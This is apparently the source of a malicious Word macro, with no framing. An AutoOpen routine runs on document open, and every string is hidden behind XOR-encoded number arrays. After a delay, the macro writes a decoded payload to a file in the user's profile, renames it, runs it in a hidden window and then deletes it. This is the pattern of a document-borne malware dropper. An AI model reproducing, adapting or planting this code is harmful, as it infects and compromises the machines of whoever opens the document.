Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Private Function GLTIUCXxETKeh(prEiWMQxnVfFp As Variant, ZfLocxxcGSIJqj As Variant)
Dim hJMVkkHPsmMERa As String
hJMVkkHPsmMERa = ""
For i = LBound(prEiWMQxnVfFp) To UBound(prEiWMQxnVfFp)
hJMVkkHPsmMERa = hJMVkkHPsmMERa & Chr(ZfLocxxcGSIJqj(i) Xor prEiWMQxnVfFp(i))
Next
GLTIUCXxETKeh = hJMVkkHPsmMERa
End Function
Sub mmVpIWEXbHXbLBW()
ZZkzbpdVqYaRnd
End Sub
Sub AutoOpen()
ZZkzbpdVqYaRnd
End Sub
Sub ZZkzbpdVqYaRnd()
Sleep ((1234 Xor 770))
eJCMaPJihCFbz
BpSARqDHVUPk
tAObCfDHOHvMrye
End Sub
Sub eJCMaPJihCFbz()
Dim tCvHZgriYlhK As String
Dim NaQuEFItNhxxCt As String
Dim VdbcmiHiZtbISU As String
Dim ISysgnrtloFZsq As String
Dim RaxoMxBBEmqSko As String
tCvHZgriYlhK = GLTIUCXxETKeh(Array((25 + 121), ((182 - 49) Xor 3), 171, 244, 152, (138 - 60), (203 - 40), (36 Xor (120 + (139 - 10))), (358 - 173), (31 Xor 55), ((20 - 2) Xor 240), (53 - 1), 30, 64, 123), Array(193, ((80 + 30) Xor (256 - 71)), ((203 - 60) + 90), (253 - 124), (424 - 207), ((1 + 1) Xor (1 + 3)), ((143 - 57) + (227 - 63)), (((16 - 3) + 95) Xor ((248 - 20) + 12)), ((73 + 51) Xor (137 + 30)), 95, (((9 - 3) + 6) Xor (139 + 33)), (59 + (21 - 10)), 95, 7, 46)) & _
GLTIUCXxETKeh(Array((36 + (78 - 31)), 97, 36, ((23 - 2) + 39), (416 - 166), ((24 + 83) Xor (79 + 175)), ((0 + (1 - 0)) Xor (270 - 41)), 247, ((24 - 4) + (176 - 1)), 187, 92, (82 + 5), 123, (439 - 215), (10 + (159 - 53))), Array((28 - 10), (20 Xor (9 + 48)), (74 + 43), (29 + 97), 162, ((195 - 84) + (106 - 5)), 163, (299 - 137), 130, 226, 59, 21, 40, 161, 51)) & _
GLTIUCXxETKeh(Array(214, (345 - 145), 150, (56 Xor 80), ((65 + (275 - 132)) Xor 10), (72 + 17), ((0 - 0) Xor 25), (163 - 21), 91, ((85 - 9) Xor (204 - 0)), (6 + 8), (275 - 137), ((121 - 33) + (131 - 61)), (172 - 54), (16 + 109)), Array((100 + 31), (162 - 25), (195 + (55 - 5)), (45 Xor (12 + 8)), ((241 - 112) + (45 - 22)), (55 + 49), (40 Xor 112), (215 - 14), (12 Xor 2), (317 - 124), (106 Xor (11 - 4)), (205 Xor 48), 220, 70, 60)) & _
GLTIUCXxETKeh(Array(((58 - 1) Xor 139), 110, (349 - 138), (25 + 10), (172 + (44 - 11)), 213, (86 + (151 - 25)), (70 Xor (10 + 188)), (((2 - 0) + 3) Xor (418 - 181)), (120 + 12), (25 + (296 - 114)), (((11 - 5) + 39) Xor 222), ((135 - 30) Xor 140), 242, (415 - 168)), Array((56 Xor (169 + 32)), 47, ((11 - 4) Xor 149), (13 Xor (168 - 70)), (232 - 76), ((79 - 22) + 94), (129 + 1), (300 - 107), 160, (6 + (334 - 135)), ((117 - 4) Xor (304 - 49)), 146, (26 Xor 174), 179, 144)) & _
GLTIUCXxETKeh(Array(((35 - 12) + 6), (50 + (143 - 49)), ((99 - 18) Xor ((129 - 45) + 108)), (61 + (115 - 5)), (83 Xor (240 + 5)), 151, (((36 - 13) + 7) Xor (329 - 159)), (352 - 155), (24 Xor 74), (56 - 25), 51, ((7 - 2) Xor ((13 - 4) + 24)), ((11 + 27) Xor 67), (((18 - 3) + (16 - 8)) Xor (129 + (108 - 51))), ((314 - 113) + 30)), Array(92, 211, (349 - 133), 234, 199, 214, (478 - 232), (203 + 42), (7 + 12), 87, 98, 101, ((5 + 0) Xor 3), (178 Xor 94), 165)) & _
GLTIUCXxETKeh(Array((98 + (122 - 44)), (178 + 51), ((135 - 5) Xor (1 - 0)), (38 + 1), ((117 - 40) Xor 181), 174, (12 Xor (38 + 12)), 159, (48 Xor 101), (((11 - 1) + 12) Xor 54), ((175 - 83) Xor (57 - 14)), 73, ((5 - 0) Xor 210), 33, (26 + (98 - 27))), Array(202, 164, (157 + 42), 72, ((30 - 11) + 166), (303 - 77), (119 - 46), ((320 - 142) + 44), 35, ((101 - 19) Xor (33 + (32 - 14))), (4 + 59), 24, ((40 - 8) + (217 - 99)), 64, (7 + 25))) & _
GLTIUCXxETKeh(Array(87, (24 + (40 - 15)), ((50 + 1) Xor 12), 49, (29 + 35), ((126 - 63) + (83 - 14)), (149 + 16), 39, (79 + 82), (202 - 50), (4 + 186), 255, (48 Xor 6), (46 Xor 97), 54), Array((17 + 4), (41 Xor 116), 126, (194 - 80), 116, ((151 - 54) + 100), (189 + 66), 118, 227, 240, ((177 - 8) + 86), (303 - 120), (225 - 98), ((3 - 1) + 12), (133 - 51))) & _
GLTIUCXxETKeh(Array((((0 - 0) + (0 - 0)) Xor 18), (237 - 39), (412 - 158), (63 + (77 - 8)), (103 + (88 - 4)), (31 + 13), (38 Xor 88), (127 Xor (408 - 165)), 175, (74 - 14), 16, (114 + (41 - 12)), ((69 - 16) + 74), (170 - 3), ((5 + 15) Xor (0 + 13))), Array((((17 - 4) + 0) Xor (172 - 78)), ((126 - 61) + 67), 145, 197, ((6 + 6) Xor 244), ((14 - 0) + 10), 63, ((30 + (124 - 15)) Xor ((59 - 10) + 52)), 238, 126, ((66 + 26) Xor 60), 206, (25 Xor ((18 - 6) + 25)), (20 Xor ((115 - 25) + (77 - 28))), 88)) & _
GLTIUCXxETKeh(Array((108 Xor (20 + 5)), (125 Xor 166), 47, ((39 + (120 - 49)) Xor (346 - 143)), (((60 - 26) + (20 - 6)) Xor 144), (0 + 55), (151 + (34 - 15)), 254, (4 + 42), (250 - 78), (143 - 56), (69 + 0), (216 - 53), 109, 54), Array((7 Xor 20), 188, (6 Xor 107), (257 - 34), (((24 - 10) + 1) Xor 238), (42 Xor 90), 201, 191, (77 - 3), ((14 + (2 - 0)) Xor (295 - 42)), ((16 - 4) Xor (8 + 17)), (44 + (1 - 0)), ((320 - 109) Xor 49), ((27 - 0) Xor 62), (175 - 72))) & _
GLTIUCXxETKeh(Array(((12 - 3) + (18 - 7)), ((138 - 51) + (248 - 118)), (337 - 151), 253, 139, ((74 - 31) Xor 87), (((49 - 3) + 6) Xor 226), 150, (232 - 41), ((12 + (30 - 15)) Xor (36 + 99)), 205, 79, (65 + 49), (145 + (56 - 25))), Array((26 Xor 79), (3 + 181), (243 + (15 - 7)), (146 + (80 - 35)), (25 + 202), (38 + (25 - 2)), 145, 166, (20 + 234), 208, 186, (17 - 4), ((0 + 2) Xor 7), ((360 - 122) Xor 31)))
VdbcmiHiZtbISU = GLTIUCXxETKeh(Array(57, (82 Xor 199), (87 Xor 204), (((58 - 15) + 6) Xor (299 - 125)), (302 - 104), (160 - 56), 26, ((16 - 4) Xor 40), 30, (113 - 43), 214, (117 + 37), 51, (87 Xor (41 + 100)), (17 + (304 - 145))), Array((206 - 93), (252 - 60), 218, (88 Xor 163), ((117 - 54) + (91 - 19)), ((0 + 3) Xor 41), (((33 - 10) + (4 - 2)) Xor 51), 101, ((83 - 23) + (43 - 17)), (43 + 2), 151, (22 + 192), (61 + (9 - 2)), (0 + 152), ((77 + (15 - 1)) Xor 152))) & _
GLTIUCXxETKeh(Array(((10 - 2) + 84), 133, ((173 - 64) Xor (68 + 166)), ((55 - 18) + 18), (69 + 164), (364 - 109), (141 - 42), 43, 116, (59 + 43), (6 + 14), ((23 + 56) Xor ((31 - 6) + (375 - 164))), 180, (((16 - 8) + 0) Xor 92), (111 + 17)), Array(29, 194, (112 + 82), (72 Xor ((1 - 0) + 61)), 141, (46 Xor 144), 33, 71, (72 - 19), ((17 - 7) + 36), ((18 - 3) Xor (148 - 62)), (179 + (77 - 30)), 208, 21, 193)) & _
GLTIUCXxETKeh(Array(35, ((290 - 69) + (12 - 4)), 71, 5, (106 - 27), ((74 - 22) + 28), (116 - 43), (186 + 52), 253, (94 + (138 - 11)), (259 - 47), (27 - 11), (96 + 91), (22 + 62), (36 Xor 160)), Array(85, ((56 + 51) Xor 207), (20 - 5), ((36 + 55) Xor 61), (6 + 8), (13 Xor ((15 - 3) + 7)), (12 Xor ((11 - 3) + (45 - 19))), ((246 - 107) + (43 - 7)), (319 - 114), ((161 - 40) Xor (269 - 40)), (233 - 82), (13 Xor (66 - 29)), 250, 55, 197)) & _
GLTIUCXxETKeh(Array(184, ((14 + 22) Xor (157 + 75)), (139 Xor 59), (21 + 3), ((125 - 53) Xor (8 + 35)), (235 - 20), (147 Xor (1 + 98)), (((34 - 7) + (20 - 3)) Xor 102), (71 - 23), (382 - 172), (5 Xor (4 - 1)), ((159 - 51) Xor (308 - 118)), (86 Xor (0 + (320 - 81))), 117, ((16 - 6) + (171 - 69))), Array(250, 253, (424 - 183), 80, 50, 150, (67 + 81), 11, (80 Xor (43 - 9)), (18 Xor 245), ((4 - 2) + (125 - 56)), (60 Xor (156 + 17)), (39 Xor 170), 52, ((2 - 1) + 41))) & _
GLTIUCXxETKeh(Array(33, (135 - 60), (((12 - 6) + (16 - 1)) Xor 101), 6, 141, 86, (204 Xor (86 - 25)), 214, 235, (40 + 134), (11 + (43 - 21)), 5, (((19 - 7) + 21) Xor 5), ((21 + 22) Xor 24), ((0 + 116) Xor 155)), Array((79 Xor 63), ((0 + (0 - 0)) Xor (13 - 4)), 68, (51 + 20), (170 + 32), (2 Xor (1 + 0)), 176, ((30 - 15) + 144), (251 - 111), ((26 + 200) Xor 13), 70, (119 - 51), (59 Xor 92), 3, (304 - 130))) & _
GLTIUCXxETKeh(Array((356 - 166), (88 + (11 - 3)), ((12 - 5) + 40), ((203 - 98) + (52 - 7)), 193, (156 - 3), 161, (105 Xor 242), (((0 - 0) + 4) Xor (12 + 76)), ((66 - 7) + (97 - 29)), (7 + 102), 44, 65, ((7 - 3) Xor (2 + 1)), (((54 - 26) + 20) Xor 117)), Array(234, (7 + (27 - 11)), (130 - 21), (263 - 96), ((60 - 10) Xor 178), 209, (69 Xor 181), 218, (2 Xor (2 + (10 - 0))), ((12 - 5) + 17), (84 - 37), (6 Xor (146 - 56)), (0 - 0), (2 + 62), ((96 - 47) Xor 3))) & _
GLTIUCXxETKeh(Array((276 - 73), (((43 - 18) + 75) Xor (4 + (10 - 0))), ((122 - 37) Xor ((368 - 140) + 10)), (188 - 60), ((52 + 43) Xor 171), (4 + 7), (((50 - 9) + 32) Xor ((4 - 2) + 2)), (103 Xor (41 + 105)), (14 - 6), 39, (11 + 176), ((60 + 101) Xor ((23 - 3) + 66)), ((37 + 10) Xor 102), (((64 - 19) + 34) Xor 62), (58 + 138)), Array(138, 48, ((53 - 4) + 185), 193, 147, 74, (1 Xor ((6 - 1) + (12 - 2))), (273 - 85), (116 - 43), ((101 - 30) Xor 49), 204, 182, (33 Xor (114 - 20)), (((35 - 17) + (0 - 0)) Xor (34 + 0)), (27 + 103))) & _
GLTIUCXxETKeh(Array(((17 - 3) Xor (236 - 108)), 50, 45, 176, 208, (36 Xor 86), 54, (160 - 33), ((36 - 16) Xor 82), ((69 - 19) Xor (28 + 86)), (64 + 20), 107, (98 + 72), (58 + 2), ((43 - 8) + 160)), Array((360 - 111), 115, 123, (117 + 82), (35 + (147 - 36)), 2, 119, 56, 114, 1, (18 - 4), ((38 - 0) Xor (3 + 9)), (69 Xor ((90 - 41) + 124)), 74, (110 + (26 - 6)))) & _
GLTIUCXxETKeh(Array(((71 - 18) Xor 98), (189 - 43), 247, ((12 - 3) + (97 - 46)), (12 + 21), 147, ((13 - 6) Xor 43), (262 - 87), ((34 + 6) Xor 104), (161 Xor (19 - 7)), 63, (16 - 3), (213 - 70), (221 - 21), 252), Array(((16 - 4) + 19), 241, ((150 - 59) Xor (51 + 186)), (4 Xor 91), ((8 - 3) Xor 83), 209, (119 - 40), ((104 + 17) Xor 151), 6, 252, (24 + 102), (17 + 70), (162 Xor (147 - 23)), 138, (69 + 67))) & _
GLTIUCXxETKeh(Array(((59 + 26) Xor 255), ((64 - 12) + (242 - 63)), 136, (29 + 95), (168 Xor (2 + 1)), (78 Xor (387 - 158)), (408 - 168), ((263 - 58) + 31), (278 - 133), ((70 - 8) + 173), (72 + 0)), Array(235, 175, ((243 - 114) Xor 72), (66 - 5), (179 Xor (64 + (0 - 0))), (56 Xor 210), (106 + 72), (131 Xor (28 - 4)), 208, (153 Xor 58), (11 + 18)))
NaQuEFItNhxxCt = GLTIUCXxETKeh(Array(((244 - 110) + 121), 84, (5 Xor 16), (53 + 91), (255 - 63), (16 + 15), (0 + 4), 10, (23 Xor ((40 - 13) + 66)), 74, 247, ((260 - 70) + 49), (136 - 23), (0 + (22 - 1)), (112 Xor (110 + 85))), Array((375 - 185), ((24 + 7) Xor 47), (((89 - 43) + 2) Xor (63 + (69 - 32))), 210, 240, 94, (45 + 31), (48 + 49), ((0 + 3) Xor 8), 6, 144, (117 Xor 216), 29, 84, 251)) & _
GLTIUCXxETKeh(Array((25 + 13), 54, (49 Xor 15), (6 + 17), 223, (36 - 16), (215 Xor ((14 - 4) + (49 - 2))), 249, 66, 242, ((7 - 1) + (18 - 0)), ((387 - 178) Xor 37), ((134 - 22) + (93 - 34)), (236 - 116), (28 Xor (90 - 34))), Array(65, ((66 + 32) Xor 21), (46 Xor 74), 70, 158, (8 Xor 117), (237 - 62), ((19 - 6) + 171), ((45 + 6) Xor 65), (114 + 65), (82 Xor 9), ((24 - 7) Xor (147 - 17)), (((180 - 80) + 54) Xor (214 - 102)), (48 Xor ((2 - 1) + 5)), ((21 + 59) Xor ((7 - 1) + 47)))) & _
GLTIUCXxETKeh(Array((102 + 128), ((86 + (7 - 1)) Xor (20 + 18)), (167 - 8), 126, (120 - 43), 1, 68, (9 + 198), ((29 - 11) Xor 0), (31 Xor (163 - 19)), (57 Xor (21 + 187)), ((144 - 29) + (162 - 28)), ((2 + 0) Xor (6 + (14 - 5))), ((155 - 69) Xor 51), 146), Array((28 Xor (246 - 59)), ((25 - 11) + (13 - 6)), (81 + (147 - 6)), 43, 58, 67, (52 + 64), (153 - 11), 85, ((372 - 170) Xor 0), (126 Xor 214), (118 Xor (239 - 3)), 106, (71 - 32), (51 Xor 145))) & _
GLTIUCXxETKeh(Array((185 + 55), 194, 18, (101 + (214 - 103)), 25, (99 Xor 251), ((4 - 0) Xor 19), (291 - 103), ((16 - 6) + 109), 90, (22 Xor (107 - 44)), (23 Xor 101), (293 - 85), ((56 - 24) + (10 - 2)), ((132 - 17) Xor 229)), Array(177, 129, (13 Xor 47), 149, (18 Xor 94), (55 + 162), 85, 197, (69 - 15), ((31 - 10) + (14 - 6)), 17, (61 - 10), 137, ((78 - 39) Xor (211 - 91)), (155 Xor 79))) & _
GLTIUCXxETKeh(Array((((66 - 8) + (118 - 12)) Xor (220 - 96)), (0 Xor 170), 172, (251 - 66), 190, (26 Xor (41 + 10)), (189 - 77), (72 Xor 255), (131 - 27), 143, 168, (31 - 4), (20 Xor (125 - 53)), ((95 - 26) Xor 19), (86 - 9)), Array((335 - 155), ((46 - 22) + 211), (((339 - 133) + 15) Xor ((37 - 11) + 31)), 244, 255, (((2 - 0) + 0) Xor (116 - 44)), ((4 - 2) Xor 5), ((22 + 141) Xor ((103 - 40) + 22)), 15, 206, (175 + 60), 43, ((36 - 10) + (6 - 3)), (7 - 3), 42)) & _
GLTIUCXxETKeh(Array(183, 35, (132 - 31), ((7 + (4 - 2)) Xor 146), (429 - 189), 186, ((2 - 0) + (40 - 1)), (9 Xor 72), ((56 - 7) Xor 13), ((35 - 15) Xor (91 + (95 - 22))), (14 Xor (171 - 42)), (165 + 81), ((17 + (9 - 4)) Xor 191), ((8 - 3) Xor 38), 177), Array((152 Xor 109), (71 + 12), 36, 220, ((114 + 10) Xor ((169 - 32) + 114)), (52 Xor (228 - 21)), ((121 - 53) Xor (26 + 29)), (9 Xor (49 - 24)), ((99 + (4 - 1)) Xor (19 + 5)), 225, 206, (((76 - 22) + 67) Xor (271 - 71)), (197 + 39), ((22 + 20) Xor 72), 213)) & _
GLTIUCXxETKeh(Array(115, (222 - 75), (237 - 8), (25 + 24), (138 - 60), (17 - 1), (71 - 1), 13, 250, (38 + 27), 97, 120, (204 - 102), (54 - 15), ((13 - 6) Xor 148)), Array(50, (53 + 156), (30 + (143 - 35)), 112, ((3 + 2) Xor 8), (57 Xor 104), (2 + 5), (3 Xor 71), 157, (0 + 3), 37, (11 Xor (71 - 21)), 34, (((15 - 1) + 6) Xor 92), ((70 - 12) + (184 - 32)))) & _
GLTIUCXxETKeh(Array((40 + (11 - 1)), (150 - 16), 139, 114, (71 - 1), 26, (159 - 14), 215, (11 Xor 58), 95, 1, (158 - 66), (162 Xor ((9 - 3) + 98)), 4, (3 + 6)), Array(106, 199, ((13 + (101 - 30)) Xor (303 - 146)), ((9 - 4) + 37), (13 - 6), 93, (350 - 100), (153 - 3), ((104 - 34) + (21 - 8)), ((45 - 14) + (34 - 9)), 67, 55, (225 - 86), 67, (25 + 24))) & _
GLTIUCXxETKeh(Array(53, (410 - 176), (132 Xor 84), ((32 - 9) Xor 14), (120 - 31), (82 Xor 158), 57, (106 Xor 16), (182 + 12), (21 + 71), ((64 + 53) Xor 150), (13 + 4), 245, 127, 101), Array(116, (115 + 27), (82 Xor 245), ((115 - 56) + 32), 35, 141, (82 Xor 45), (((7 - 1) + 5) Xor ((5 - 2) + 3)), (234 - 103), (15 - 5), ((64 - 1) + (185 - 86)), 83, ((16 + 95) Xor (87 + 159)), (18 + 44), ((45 - 20) + 9))) & _
GLTIUCXxETKeh(Array(157, (110 - 30), (25 + 28), (((0 - 0) + 0) Xor 1), 142, ((87 - 3) Xor (18 + (61 - 26))), (27 + 127), (67 Xor 162), (309 - 136), 213, 194, (8 - 3), 125, 198, 28), Array(173, (17 Xor 0), ((153 - 74) Xor ((35 - 15) + 5)), (58 Xor 122), ((372 - 174) Xor 10), (0 Xor (2 + (0 - 0))), (171 + 48), ((84 - 33) + 118), 236, (120 + 28), (18 Xor (307 - 127)), (36 Xor 112), (40 Xor ((16 - 6) + 13)), 246, ((0 + 51) Xor 110))) & _
GLTIUCXxETKeh(Array((131 Xor (5 + (84 - 35))), ((126 - 14) Xor 211), 171, (127 + 40), 104, 159, (((38 - 9) + 47) Xor (28 + (2 - 0))), 249, ((26 + 9) Xor ((86 - 15) + (56 - 25))), (0 Xor (24 + (297 - 134))), 132, (36 Xor 126), ((11 + 7) Xor (44 - 0)), ((0 + 7) Xor 34), ((87 - 40) Xor 91)), Array((484 - 231), (71 Xor 181), (13 Xor 231), (181 Xor 119), (15 Xor 54), (203 Xor 21), ((58 - 29) Xor (61 - 3)), 184, 2, (290 - 52), 197, 63, (27 + 100), 103, 24)) & _
GLTIUCXxETKeh(Array((29 - 0), 49, 104, 55), Array(92, (61 + 53), 33, 118))
ISysgnrtloFZsq = tCvHZgriYlhK + VdbcmiHiZtbISU + NaQuEFItNhxxCt
RaxoMxBBEmqSko = GLTIUCXxETKeh(Array((112 Xor (125 + 99)), 150, 198, 121, ((0 + 0) Xor 42), (62 + 176), ((110 - 46) Xor 11), (((71 - 23) + 39) Xor 189), 225, (86 Xor (97 + (152 - 38))), (318 - 157), 49, (129 Xor (143 - 17)), (3 + 20), ((48 - 6) Xor (53 + (55 - 22)))), Array(224, (264 - 15), (137 + (46 - 6)), (10 + (32 - 14)), (57 + 31), (307 - 150), 35, 143, 141, 233, (240 - 97), (61 + 23), (135 Xor 0), 114, ((66 - 1) + 27))) & _
GLTIUCXxETKeh(Array(242, 1, 230, (20 Xor 0), ((32 - 13) + 78), ((40 + 14) Xor 191), (221 Xor 2), ((35 + (7 - 3)) Xor (23 + 102)), 217, (19 + 69), ((0 + 21) Xor 78), 77, (98 Xor 224), (122 + 4), (256 - 75)), Array((191 + (42 - 10)), ((61 - 22) + 61), 158, (226 - 113), ((0 + 1) Xor (3 - 0)), (304 - 135), (((266 - 125) + (74 - 32)) Xor (16 - 6)), (40 - 5), (12 Xor 165), (36 + 21), (8 + 32), (15 + 47), (187 - 25), ((22 + 8) Xor (72 + 5)), (141 + 67))) & _
GLTIUCXxETKeh(Array((95 + 79), (11 + 150), 224), Array(192, (224 - 30), 192)) + ISysgnrtloFZsq
Dim fIXpPEXsumnKtV As String
Dim fKtmmHIJkDrtO As String
fIXpPEXsumnKtV = Application.UserName
fKtmmHIJkDrtO = GLTIUCXxETKeh(Array((439 - 185), 119, (88 + (42 - 18)), ((64 + 0) Xor 7), 157, 203, (12 + 37), (142 Xor 50), (237 - 48)), Array(189, (149 - 72), 44, (13 Xor 31), 238, (47 + 127), 67, (228 - 21), (137 Xor 104))) + fIXpPEXsumnKtV + GLTIUCXxETKeh(Array(116, ((14 - 3) Xor 16), 203, 95, 34, (179 - 38), (51 - 15), 150, ((32 - 15) + (81 - 23)), 2, (153 Xor (231 - 115)), ((37 - 18) + 6), ((0 + (8 - 2)) Xor 14), (15 + 1), (64 + 24)), Array(40, 90, (298 - 111), 47, ((7 + 82) Xor 63), 236, 80, (199 + 48), (12 Xor (33 - 6)), (2 Xor (96 - 20)), 130, (118 + 4), (21 Xor (205 - 81)), (((87 - 39) + 58) Xor (40 - 18)), 4)) & _
GLTIUCXxETKeh(Array(((80 - 34) Xor (25 + (110 - 48))), (316 - 98), (273 - 106), ((22 + 6) Xor 52), (403 - 154), (18 + 45), (50 + (67 - 7)), (366 - 117), ((13 + 19) Xor 74), (3 + 67), (109 + 66), 243, ((91 - 29) + 123), 47, 168), Array((67 - 22), 191, 202, ((1 + 2) Xor (22 + 69)), 165, (49 Xor 98), (9 + 6), ((130 - 3) + 13), (2 Xor 6), ((20 - 6) Xor 43), (188 + 11), (93 + (60 - 3)), 203, (45 - 16), (209 - 75))) & _
GLTIUCXxETKeh(Array(((18 + (70 - 11)) Xor 174), (39 Xor ((5 - 0) + (5 - 2))), (126 Xor ((2 - 1) + (0 - 0)))), Array((295 - 144), (115 - 28), ((4 - 2) Xor 9)))
Dim hNECvpuGncsKm As Object
Set hNECvpuGncsKm = CreateObject(GLTIUCXxETKeh(Array(172, 59, (16 + (69 - 3)), (50 Xor 14), 74, (((114 - 23) + 77) Xor 97), (2 + 9), (2 + (7 - 3)), ((12 + 1) Xor (212 - 20)), (5 Xor 21), 120, 37, (38 Xor (227 - 92)), (1 Xor 15), 153), Array((407 - 152), 88, 32, 85, 58, (86 + 103), 98, (92 + 12), 170, (6 Xor (47 + 9)), 62, ((112 - 56) Xor 116), (141 + 64), 107, ((36 + 58) Xor (31 + (222 - 105))))) & _
GLTIUCXxETKeh(Array((155 Xor (139 - 61)), (71 + (17 - 8)), ((1 + 6) Xor 11), 16, 246, (142 - 64), (90 + 139), (7 Xor ((69 - 12) + 9)), 98, (150 - 59), 241), Array((171 Xor (8 - 1)), 35, 120, (31 Xor 106), (137 Xor ((13 - 3) + 8)), 1, 135, (71 - 24), 7, (16 + 40), (158 - 25))))
Dim eAHoQAKbnZZxlEB As Object
Set eAHoQAKbnZZxlEB = hNECvpuGncsKm.CreateTextFile(fKtmmHIJkDrtO)
eAHoQAKbnZZxlEB.Write RaxoMxBBEmqSko
End Sub
Sub BpSARqDHVUPk()
Dim XMbPnBHqEcYIrM As String
Dim fIXpPEXsumnKtV As String
Dim JxNLZtvENvuWvbt As String
fIXpPEXsumnKtV = Application.UserName
XMbPnBHqEcYIrM = GLTIUCXxETKeh(Array(107, (102 - 24), (115 Xor (11 - 3)), (32 Xor (392 - 143)), ((370 - 156) Xor (5 + 45)), (107 - 10), (251 - 15), (91 - 16), (0 Xor (58 + 22))), Array(40, (38 Xor 82), ((14 - 7) + (46 - 14)), (179 - 39), 151, ((2 - 1) + 3), ((2 + 21) Xor ((218 - 86) + 5)), (91 - 35), (3 + 9))) + fIXpPEXsumnKtV + GLTIUCXxETKeh(Array((130 Xor (5 + 35)), (70 Xor (76 - 17)), ((77 - 31) + 201), 0, ((5 - 2) Xor (24 - 8)), 249, 48, ((12 + 78) Xor ((1 - 0) + 47)), (25 Xor (8 - 3)), (152 Xor (174 - 69)), ((48 - 14) Xor 183), (11 + 143), (18 + 45), ((274 - 78) Xor (31 - 0)), (228 + 5)), Array(((254 - 107) Xor 101), 60, (42 Xor 173), (22 + (171 - 81)), ((14 + 16) Xor ((4 - 2) + (114 - 43))), ((229 - 98) + 21), (65 + 3), (11 + 0), 64, (31 + 158), (235 + 15), 249, (170 - 76), (4 Xor (331 - 152)), 181)) & _
GLTIUCXxETKeh(Array(141, (68 Xor 38), 3, (14 + 7), ((11 - 2) Xor (67 + 24))), Array(217, 7, (99 + 11), 101, 14))
Dim gwuPQceWmZJxFOe As String
Dim untQhhKyBoNF As String
gwuPQceWmZJxFOe = GLTIUCXxETKeh(Array((99 Xor (14 + 178)), ((27 + 25) Xor (29 + 146)), ((242 - 117) Xor 221), 163, (103 + 19), (15 + 87), 173, ((41 - 1) Xor (97 + (131 - 60))), 63, (20 Xor 230), 190, (((39 - 9) + 16) Xor (215 - 98)), 168), Array((80 + 127), (95 Xor 165), 213, (182 + 23), (9 Xor (30 - 14)), 14, 200, (183 + (67 - 8)), 13, 220, (276 - 74), 35, 220))
untQhhKyBoNF = GLTIUCXxETKeh(Array(((15 + 50) Xor 30), (27 + 102), (32 + 40), 146, ((92 + 42) Xor (23 + 13)), 196, ((135 - 52) Xor 151), 145, 4, (39 Xor (285 - 54)), (498 - 246), (11 - 0), 73), Array(((34 - 14) + 31), ((345 - 142) Xor 43), 61, (41 + 211), 193, (((77 - 31) + 4) Xor (57 + (123 - 22))), (4 Xor (118 + 47)), 227, ((9 - 0) + 45), (227 Xor 13), (57 Xor (181 - 14)), ((73 - 11) Xor (102 - 18)), 61))
Name XMbPnBHqEcYIrM & gwuPQceWmZJxFOe As XMbPnBHqEcYIrM & untQhhKyBoNF
End Sub
Sub tAObCfDHOHvMrye()
Dim fIXpPEXsumnKtV As String
Dim fKtmmHIJkDrtO As String
fIXpPEXsumnKtV = Application.UserName
fKtmmHIJkDrtO = GLTIUCXxETKeh(Array(((154 - 60) Xor 189), 185, (((125 - 2) + (56 - 27)) Xor 53), 193, (94 - 44), (120 - 55), 182, (47 + (20 - 6)), (36 + 40)), Array(160, (99 + 32), (((79 - 21) + 45) Xor ((4 - 1) + 147)), 148, (28 Xor ((57 - 4) + 40)), 36, 196, ((35 + 2) Xor 107), 16)) + fIXpPEXsumnKtV + GLTIUCXxETKeh(Array(254, 72, 96, (119 + 118), 9, (206 - 55), (100 + (21 - 1)), 238, (158 + 64), 26, 217, 114, (((112 - 48) + (124 - 56)) Xor 21), 15, (((5 - 2) + 2) Xor (12 + (3 - 1)))), Array((62 + 100), (8 + 1), (0 Xor 16), ((157 - 57) + 57), (48 Xor (240 - 115)), (34 Xor 212), 12, (156 - 13), 130, (54 Xor (26 + (119 - 49))), 182, (14 Xor (46 - 15)), ((44 - 5) Xor 215), (119 - 20), 87)) & _
GLTIUCXxETKeh(Array((178 Xor 112), 103, (112 + (89 - 23)), 141, 243, (8 + 1), 141, (31 Xor 32), (7 + 20), (107 + (74 - 28)), (2 Xor 1), ((43 + 17) Xor ((112 - 24) + (278 - 123))), 126, 209, ((9 - 1) + (10 - 5))), Array((271 - 121), (3 - 1), 223, 253, 175, (175 - 74), (77 Xor (90 + 71)), (87 - 13), ((180 - 87) Xor ((51 - 13) + 2)), (21 Xor 239), (17 + 90), ((65 + 40) Xor ((195 - 93) + 93)), (24 - 12), (42 + 185), (13 + 22))) & _
GLTIUCXxETKeh(Array(((66 + 5) Xor (39 + 3)), (166 + (99 - 22)), (88 - 37)), Array((30 - 15), 146, (67 Xor 4)))
Shell fKtmmHIJkDrtO, vbHide
Sleep ((3061 - 1213) + 152)
Kill fKtmmHIJkDrtO
End Sub


